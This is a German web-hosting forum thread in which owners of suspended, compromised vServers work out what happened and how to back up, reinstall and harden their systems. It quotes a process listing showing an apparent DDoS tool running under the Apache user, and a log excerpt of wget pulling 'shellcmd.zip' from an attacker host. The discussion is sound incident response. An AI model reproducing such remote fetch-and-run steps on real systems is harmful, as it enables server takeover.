vServer von Server4You gesperrt

Hallo,
Merlok said:
Den Auszug von wstuermer habe ich mir angesehen. Aber ich erkenne darauf irgendwie nichts. Wobei ich dazu sagen muss dass ich kein Experte auf dem Gebiet bin.
Wo sehe ich denn da dass Code eingeschleust wurde und ausgeführt wird?
Click to expand...

Dies ist die Ausgabe die hier gepostet wurde. Diese wird mit dem Befehl: ps auxf generiert.
Code: 
wwwrun   13515  0.0  0.1   1812   784 ?        Ss   Dec22   0:00 httpd
wwwrun   13963 69.0  0.0   1508   476 ?        R    Dec23 570:35  \_ ./s 98.64.62.236 53
Du siehst in der ersten Zeile den httpd Prozess, also den Apache Webserver -was soweit korret ist- und darunter sieht du einen Childprozess von httpd der allerdings das Programm "s" ausführt (sehr schön um zu verschleiern dass es sich um Malware handelt....naja ich würde vermutlich meine Programme auch nicht 'böses spam programm' nennen oder so ;) ) und dahinter sind noch ein paar Optionen, ich nehme an die IP und der Port die geDDoSt werden sollen.

Eine "korrekte" Ausgabe sähe so aus:
Code: 
root     24253  0.0  0.9  80720  5208 ?        Ss   15:01   0:00 /usr/sbin/apache2 -k start
www-data 25697  0.0  1.0  80756  5324 ?        S    15:05   0:00  \_ /usr/sbin/apache2 -k start
www-data 25698  0.0  0.6  80980  3668 ?        S    15:05   0:00  \_ /usr/sbin/apache2 -k start
www-data 25699  0.0  0.7  80980  3812 ?        S    15:05   0:00  \_ /usr/sbin/apache2 -k start
www-data 25700  0.0  0.7  80980  3696 ?        S    15:05   0:00  \_ /usr/sbin/apache2 -k start
Hier siehst du die Ausgabe von einem meiner Server. In der ersten Zeile ist der Apache Hauptprozess und darunter jeweils ein apache Ableger :) Nur mal so zum Vergleich.
 
Rescue ist das vernünftigste! Dann einfach alles was im Rescure unter /blablubb (das Verzeichnis, in welches Dein vServer "gemounted" ist) mit tar packen, und auf Deinen PC lokal sichern, dann kannst Du das in Ruhe durchwühlen.

Dann den Server unbedingt neu aufsetzen, also nicht wieder normal starten, da Du nie weisst was der Kerl sonst noch so alles damit angestellt hat.

viele Grüße
Basti
 
Ah! Danke djrick. Jetzt seh ich da schon eher was da gefunden wurde.

@wstuermer: Seit wann reicht da eine Einmalzahlung von 39 EUR?

Letztes Jahr musste ich 39 EUR für die Sperrung, und nochmal 39 EUR für die Entsperrung blechen!
1 AE = 39 EUR, Entsperrung und Sperrung jeweils 1 AE. Also insgesamt 2 AE für 78 EUR.
Oder hat sich da was getan?

Denn die jetzigen 39 EUR sind NUR für das Sperren des Servers, und nicht für das Entsperren!

Edith sagt:
Einmalig 39 EUR sind doch korrekt. Eben bei der Hotline hinterfragt. Dann kamen meine 78 EUR durch ein Backup zustande was ich damals mit einbezogen hatte.
 
Last edited by a moderator:
mein vServer ist jetzt freigeschaltet, ich hab gleich versucht alle Dateien vom Betriebssystem zu sichern, aber leider klappt das nicht:

wenn ich den Ordner /mnt per SCP herunterladen will:
Code: 
scp -r root@vsxxxxx.vserver.de:/mnt /home/alex/backup
dann werden ca. 50 Dateien kopiert und danach kommt die Meldung:
Code: 
scp: mnt/dev/null: not a regular file
und der Transfer bricht ab.

wenn ich den Ordner /mnt per
Code: 
tar -cjf mnt/backup mnt/
packe und ihn dann herunterlade und auf meinem Heimrechner entpacke, bricht es nach ein paar Minuten mit einer Fehlermeldung ab

Was habe ich falsch gemacht? Bzw. welche Dateien und Ordner muss ich kopieren?

Falls es unerwünscht ist, das solche Fragen direkt im dazugehörigen Thema gestellt werden, bitte verschieben
 
Am wichtigsten sind alle Daten unter /var/log. Denn da sind deine Logfiles drin, die dir sagen, was falsch gelaufen ist.
 
Hallo,

Du wirst das /dev Verzeichnis nicht sichern können.
Am Besten sicherst du nur die Verzeichneisse die du wirklich brauchst.
 
Das /var/log-Verzeichnis ist jetzt gesichert, ich denke aus dem kann man schon auslesen was genau passiert ist, oder gibt es noch irgendwelche wichtigen Verzeichnisse, die unbedingt gesichert werden sollten? Und aus welchen Dateien kann ich auslesen, was passiert ist?

Und dann nach der Neuinstallation (Debian Standard ohne Controlpanel):
Erst mal eine kleine Frage: macht es einen Unterschied, ob man Debian 32 oder 64-Bit wählt? Von dem Programmen her klar, aber auch von der Geschwindigkeit her?
Wenn ich mein System nach diesem Howto absichere, kann ich mir dann sicher sein, das mein System gut genug abgesichert ist?

Vielen Dank für eure Hilfe, ich bin leider ziemlicher Linux-Neuling (abgesehen von Ubuntu:D)
 
Falls mein Problem in einem separaten Thread diskutiert werden sollte, dann bitte meinen Beitrag in einen neuen Thread verschieben.
Ich antworte hier weil ich das vorher bereits getan habe, und dasselbe Problem habe/hatte wie alex.

Mein vServer ist nun ebenfalls wieder entsperrt (dank dem Faxgerät an meinem Arbeitsplatz).
Ich konnte bis jetzt schon sehen dass seit Inbetriebnahme im Rescuemodus diverse Hosts versucht haben Zugriff zu bekommen. Teilweise mit abstrusen Benutzernamen.

Das ganze sieht mir nach einer distributed attack aus da es nicht ein einzelner Host ist der dies versucht, sondern extrem viele verschiedene.

Gefunden habe ich dies in var/log/message.

Die aktuellen Daten meines Servers unter mnt/... beinhalten ja die letzten aktuellen Logfiles bis zur Sperrung.
Da konnte ich auch schon diverse Versuche erkennen einen SSH Username und PW zu erraten. Da hatte ich zum Glück schon vorgesorgt und Passwortauth abgeschaltet, SSH2 Only Zugriff gesetzt und Pub-/Private Key Auth only gesetzt.
Außerdem wurde wohl das PW meines FTP Servers herausgefunden (glaube ich). Denn ich sehe da von einer bestimmten IP immer wieder FTP Session opened und FTP Session closed.

Um eine Neuinstallation will ich mich nicht drücken, es muss wohl so sein.

Mir stellen sich dann jetzt aber folgende Fragen:
  1. Aus welchen Logfiles ist ersichtlich wer meinen Server gehackt hat und was genau er gemacht hat?
  2. Kann ich bedenkenlos die gesicherten Daten (ich mache gerade ein lokales Backup) aus dem Verzeichnis /srv/www/Websitexyz wieder einspielen? Oder sollte ich das eher nicht?
  3. Wie kann ich sichergehen dass so etwas nicht erneut passiert? Gibt es How To's um seinen SuSe Server abzusichern?

Ich habe da heute was von Deny Hosts gelesen. Kann mir das dabei helfen meinen Server zumindest etwas sicherer zu machen oder sind da eher andere Sachen zu empfehlen? --> Welcome to DenyHosts

Danke schonmal für eure Antworten!
 
Hallo,
Merlok said:
Ich habe da heute was von Deny Hosts gelesen. Kann mir das dabei helfen meinen Server zumindest etwas sicherer zu machen oder sind da eher andere Sachen zu empfehlen? --> Welcome to DenyHosts
Click to expand...
Früher hab ich auch mit DenyHosts gearbeitet. Mitlerweile bin ich allerdings dazu übergangen Fail2Ban zu nutzen.
Im Prinzip ists: Wer die Wahl hat hat die Qual. Die beiden Dienste machen beide ihren Job sehr gut :)
 
Ich glaube ein großer Vorteil von DenyHosts ist, dass er sich mit einer weltweiten Datenbank abgleicht. Sprich: Wenn irgendwo eine IP schonmal negativ aufgefallen ist, ist sie auch bei dir gleich mit geblockt. Fail2ban reagiert nur auf Angriffe direkt auf dein System.
DenyHosts ist deswegen mehr eine Präventivmasnahme. Natürlich kannst du auch beide Zusammen laufen lassen.
 
Fail2ban hat bei mir auf diversen openvz vServern Probleme mit dem Speicherverbrauch gemacht, hatte ich bei Rootservern nicht. Kann aber sein dass ich da was vermasselt hatte...

Basti
 
Ich werde das ganze mal testen sobald mein Server wieder neu aufgesetzt ist.

Aber eine andere interessante Sache habe ich eben im Gespräch mit alex gesehen.
In meiner Logdatei /mnt/var/log/apache2/error_log ist ganz am ende folgendes zu finden:
--20:11:08-- http://thehackers.XXXXX.com/shellcmd.zip
=> `shellcmd.zip'
Resolving thehackers.XXXXXX.com... IP, IP
Connecting to thehackers.XXXXX.com|IP|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 138,483 (135K) [application/zip]

Den Domainnamen habe ich mal ausgex't.

Könnte das ein Hinweis darauf sein von wem der Angriff kam? Dort wurde ja scheinbar eine ZIP Datei geuploadet und wohl auch entpackt.

Edit:
Ich habe mich mal nach einem passenden Buch zur Serversicherheit unter Linux umgesehen und bin dann auf diese 2 hier gestossen:
Linux Server-Sicherheit (Gebundene Ausgabe)
UNIX - Das umfassende Handbuch

Kennt dieses Buch hier jemand und kann es empfehlen? Oder gibt es bessere die sich mit dem Thema Serversicherheit beschäftigen?
Ich suche ein Buch in dem auf mögl. Risiken eingegangen wird (Erklärung wie etwas passieren kann, wie es behoben werden kann etc.) und welches sich allgemein mit der Sicherheit eines Linuxservers beschäftigt.
 
Last edited by a moderator:
Hallo,
Merlok said:
In meiner Logdatei /mnt/var/log/apache2/error_log ist ganz am ende folgendes zu finden:
--20:11:08-- http://thehackers.XXXXX.com/shellcmd.zip
=> `shellcmd.zip'
Resolving thehackers.XXXXXX.com... 205.134.160.74, 205.134.160.58
Connecting to thehackers.XXXXX.com|205.134.160.74|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 138,483 (135K) [application/zip]

Den Domainnamen habe ich mal ausgex't.
Click to expand...
Schön, dass du die Domain weg gex't hast, aber die IP dort stehen gelassen hast ;)...Naja...Jedenfalls: Ja das ist jedenfalls der Hinweiß von welcher Stelle das Zeug genommen ist.
 
Hallo!
Ich versteh das noch nicht ganz:
In seinem Apache Error Log steht eine Ausgabe von wget?

mfG
Thorsten
 
Mit shell_exec wget aufgerufen? :) Bisserl umständlich, aber scheint ja irgendiwe geklappt zu haben.
 
djrick said:
Hallo,

Schön, dass du die Domain weg gex't hast, aber die IP dort stehen gelassen hast ;)...Naja...Jedenfalls: Ja das ist jedenfalls der Hinweiß von welcher Stelle das Zeug genommen ist.
Click to expand...
Sorry daran habe ich nicht mehr gedacht. Es war schon sehr spät als ich das geschrieben habe. :)
Ich habe die IP nachträglich weggex't, müsstest Du dann allerdings auch noch tun.

@TamCore:
Danke dass Du das Teil mal "testest". Wäre echt interessant zu wissen was das Ding überhaupt macht.

Also war mein Apache scheinbar kompromittiert?

Edit: Die Frage ist dann wie derjenige die Datei hochgeladen hat. Mit root-Rechten? Oder woraus kann ich das erkennen?
 
Last edited by a moderator:
Suche nach der Datei, oder ähnlichen, und schau unter welche Benutzerrechte sie hat, das ist schonmal ein guter Anhaltspunkt. Root rechte zu erlagen ist meist nicht ganz so leicht, aber für eine DDoS brauchst Du nicht Root sein, da tuts auch der Apache User.
 
You must log in or register to reply here.
Back
Top